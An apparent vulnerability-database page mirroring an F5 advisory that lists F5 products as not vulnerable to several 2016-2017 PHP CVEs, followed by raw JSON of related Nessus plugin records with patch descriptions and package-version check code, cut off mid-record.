Search...

Multiple PHP vulnerabilities

2017-08-08T17:03:00

ID F5:K20289222
Type f5
Reporter f5
Modified 2017-08-08T20:15:00

Description

F5 Product Development has evaluated the currently supported releases for potential vulnerability.

To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:

Product| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature
---|---|---|---|---
BIG-IP LTM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP AAM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1| Not vulnerable| None
BIG-IP AFM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1| Not vulnerable| None
BIG-IP Analytics| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP APM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP ASM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP DNS| None| 13.0.0
12.0.0 - 12.1.2| Not vulnerable| None
BIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None
BIG-IP GTM| None| 11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP Link Controller| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1
11.2.1| Not vulnerable| None
BIG-IP PEM| None| 13.0.0
12.0.0 - 12.1.2
11.4.1 - 11.6.1| Not vulnerable| None
BIG-IP PSM| None| 11.4.1| Not vulnerable| None
BIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None
BIG-IP WebSafe| None| 13.0.0
12.0.0 - 12.1.2
11.6.0 - 11.6.1| Not vulnerable| None
ARX| None| 6.2.0 - 6.4.0| Not vulnerable| None
Enterprise Manager| None| 3.1.1| Not vulnerable| None
BIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None
BIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None
BIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None
BIG-IQ ADC| None| 4.5.0| Not vulnerable| None
BIG-IQ Centralized Management| None| 5.0.0 - 5.3.0
4.6.0| Not vulnerable| None
BIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None
F5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None
LineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None
Traffix SDC| None| 5.0.0 - 5.1.0
4.0.0 - 4.4.0| Not vulnerable| None

None

K9970: Subscribing to email notifications regarding F5 products

K9957: Creating a custom RSS feed to view new and updated documents

K4602: Overview of the F5 security vulnerability response policy

K4918: Overview of the F5 critical issue hotfix policy

JSON Vulners Source

Initial Source

{"href": "https://support.f5.com/csp/article/K20289222", "id": "F5:K20289222", "reporter": "f5", "published": "2017-08-08T17:03:00", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.3.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "title": "Multiple PHP vulnerabilities", "bulletinFamily": "software", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "affectedSoftware": [], "references": [], "edition": 1, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "lastseen": "2017-08-09T15:09:24", "viewCount": 20, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-08-09T15:09:24", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891034", "OPENVAS:1361412562310811482", "OPENVAS:1361412562310811487", "OPENVAS:1361412562310811486", "OPENVAS:1361412562310704081", "OPENVAS:1361412562310851607", "OPENVAS:1361412562310811484", "OPENVAS:1361412562310811488", "OPENVAS:1361412562310843281", "OPENVAS:1361412562310811481"]}, {"type": "nessus", "idList": ["SECURITYCENTER_PHP_5_6_31.NASL", "SUSE_SU-2017-2522-1.NASL", "SUSE_SU-2017-2317-1.NASL", "OPENSUSE-2017-994.NASL", "DEBIAN_DLA-1034.NASL", "PHP_5_6_31.NASL", "DEBIAN_DSA-4081.NASL", "OPENSUSE-2017-1010.NASL", "SUSE_SU-2017-2303-1.NASL", "UBUNTU_USN-3382-1.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4081-1:FFD0A", "DEBIAN:DLA-1034-1:86C1B", "DEBIAN:DSA-4080-1:ADEE1"]}, {"type": "cve", "idList": ["CVE-2017-11144", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11143", "CVE-2016-10397", "CVE-2017-11142"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2303-1", "OPENSUSE-SU-2017:2337-1"]}, {"type": "ubuntu", "idList": ["USN-3382-2", "USN-3382-1"]}, {"type": "tenable", "idList": ["TENABLE:1C269594C0F743E3C1491FA7B7821769"]}, {"type": "hackerone", "idList": ["H1:248659", "H1:248609", "H1:283644"]}, {"type": "f5", "idList": ["F5:K06420357"]}, {"type": "redhat", "idList": ["RHSA-2018:1296"]}], "modified": "2017-08-09T15:09:24", "rev": 2}, "vulnersScore": 5.7}, "modified": "2017-08-08T20:15:00"}

{"nessus": [{"lastseen": "2021-01-12T09:38:27", "description": "Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and\ncan be embedded into HTML.\n\nCVE-2016-10397 Incorrect handling of various URI components in the URL\nparser could be used by attackers to bypass hostname-specific URL\nchecks.\n\nCVE-2017-11143 An invalid free in the WDDX deserialization of boolean\nparameters could be used by attackers able to inject XML for\ndeserialization to crash the PHP interpreter.\n\nCVE-2017-11144 The openssl extension PEM sealing code did not check\nthe return value of the OpenSSL sealing function, which could lead to\na crash of the PHP interpreter.\n\nCVE-2017-11145 Lack of a bounds check in the date extension's\ntimelib_meridian parsing code could be used by attackers able to\nsupply date strings to leak information from the interpreter.\n\nCVE-2017-11147 The PHAR archive handler could be used by attackers\nsupplying malicious archive files to crash the PHP interpreter or\npotentially disclose information due to a buffer over-read in the\nphar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2017-07-24T00:00:00", "title": "Debian DLA-1034-1 : php5 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2017-07-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libphp5-embed", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5-xsl", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-mysqlnd", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-curl", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-ldap", "p-cpe:/a:debian:debian_linux:php5-fpm"], "id": "DEBIAN_DLA-1034.NASL", "href": "https://www.tenable.com/plugins/nessus/101908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1034-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101908);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\");\n\n script_name(english:\"Debian DLA-1034-1 : php5 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and\ncan be embedded into HTML.\n\nCVE-2016-10397 Incorrect handling of various URI components in the URL\nparser could be used by attackers to bypass hostname-specific URL\nchecks.\n\nCVE-2017-11143 An invalid free in the WDDX deserialization of boolean\nparameters could be used by attackers able to inject XML for\ndeserialization to crash the PHP interpreter.\n\nCVE-2017-11144 The openssl extension PEM sealing code did not check\nthe return value of the OpenSSL sealing function, which could lead to\na crash of the PHP interpreter.\n\nCVE-2017-11145 Lack of a bounds check in the date extension's\ntimelib_meridian parsing code could be used by attackers able to\nsupply date strings to leak information from the interpreter.\n\nCVE-2017-11147 The PHAR archive handler could be used by attackers\nsupplying malicious archive files to crash the PHP interpreter or\npotentially disclose information due to a buffer over-read in the\nphar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libphp5-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.45-0+deb7u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-01-20T12:33:40", "description": "This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386)\n\nOther fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 18, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2017-09-05T00:00:00", "title": "openSUSE Security Update : php7 (openSUSE-2017-994)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2017-09-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php7-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php7-readline", "p-cpe:/a:novell:opensuse:php7-pear", "p-cpe:/a:novell:opensuse:php7-sqlite", "p-cpe:/a:novell:opensuse:php7-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php7-wddx", "p-cpe:/a:novell:opensuse:php7-gd", "p-cpe:/a:novell:opensuse:php7-dom", "p-cpe:/a:novell:opensuse:php7-shmop", "p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php7-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php7-zlib", "p-cpe:/a:novell:opensuse:php7-xmlwriter", "p-cpe:/a:novell:opensuse:php7-imap", "p-cpe:/a:novell:opensuse:php7-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php7-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php7-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-debugsource", "p-cpe:/a:novell:opensuse:php7-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php7-pgsql", "p-cpe:/a:novell:opensuse:php7-dba-debuginfo", "p-cpe:/a:novell:opensuse:php7-odbc", "p-cpe:/a:novell:opensuse:php7-gmp", "p-cpe:/a:novell:opensuse:php7-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php7-zip-debuginfo", "p-cpe:/a:novell:opensuse:php7-openssl", "p-cpe:/a:novell:opensuse:php7-gettext", "p-cpe:/a:novell:opensuse:php7-pear-Archive_Tar", "p-cpe:/a:novell:opensuse:php7-curl", "p-cpe:/a:novell:opensuse:php7-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php7-debuginfo", "p-cpe:/a:novell:opensuse:php7-enchant", "p-cpe:/a:novell:opensuse:php7-fileinfo", "p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php7-soap-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php7-intl", "p-cpe:/a:novell:opensuse:php7-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php7-snmp", "p-cpe:/a:novell:opensuse:php7-zip", "p-cpe:/a:novell:opensuse:php7-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php7-mbstring", "p-cpe:/a:novell:opensuse:php7-pspell", "p-cpe:/a:novell:opensuse:php7-posix-debuginfo", "p-cpe:/a:novell:opensuse:php7-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php7-iconv", "p-cpe:/a:novell:opensuse:php7-soap", "p-cpe:/a:novell:opensuse:php7-tidy", "p-cpe:/a:novell:opensuse:php7-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php7-intl-debuginfo", "p-cpe:/a:novell:opensuse:php7-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php7-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvsem", "p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php7-opcache", "p-cpe:/a:novell:opensuse:php7-phar", "p-cpe:/a:novell:opensuse:php7-xmlreader", "p-cpe:/a:novell:opensuse:php7-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php7-tidy-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:opensuse:php7-firebird", "p-cpe:/a:novell:opensuse:php7-sockets", "p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_php7", "p-cpe:/a:novell:opensuse:php7-fastcgi", "p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php7-json", "p-cpe:/a:novell:opensuse:php7-xsl", "p-cpe:/a:novell:opensuse:php7-mysql", "p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php7-pcntl", "p-cpe:/a:novell:opensuse:php7-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php7-imap-debuginfo", "p-cpe:/a:novell:opensuse:php7-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php7-tokenizer", "p-cpe:/a:novell:opensuse:php7-json-debuginfo", "p-cpe:/a:novell:opensuse:php7-ctype", "p-cpe:/a:novell:opensuse:php7-xmlrpc", "cpe:/o:novell:opensuse:42.3", 